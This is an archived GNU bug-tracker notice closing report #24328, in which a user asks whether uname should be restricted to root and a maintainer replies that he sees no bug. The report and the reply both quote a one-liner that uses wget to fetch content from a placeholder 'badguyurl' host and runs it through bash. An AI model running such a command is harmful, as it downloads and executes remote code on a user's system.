emacs-bug-tracker
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[debbugs-tracker] bug#24328: closed (uname exploit)

From: GNU bug Tracking System
Subject: [debbugs-tracker] bug#24328: closed (uname exploit)
Date: Mon, 29 Aug 2016 15:59:02 +0000 
Your message dated Mon, 29 Aug 2016 08:58:40 -0700
with message-id <address@hidden>
and subject line Re: bug#24328: uname exploit
has caused the debbugs.gnu.org bug report #24328,
regarding uname exploit
to be marked as done.

(If you believe you have received this mail in error, please contact
address@hidden)


-- 
24328: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=24328
GNU Bug Tracking System
Contact address@hidden with problems
--- Begin Message --- Subject: uname exploit Date: Mon, 29 Aug 2016 02:25:03 -0500 User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 Hi, I am unsure if you have seen this, but I am concerned about this - can or should uname be restricted to root use only? 

uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"

--- End Message ---
--- Begin Message --- Subject: Re: bug#24328: uname exploit Date: Mon, 29 Aug 2016 08:58:40 -0700 User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 
Shane wrote:

uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"


I don't see a bug here, so I'm marking this as done.

--- End Message ---
reply via email to
[Prev in Thread] Current Thread [Next in Thread]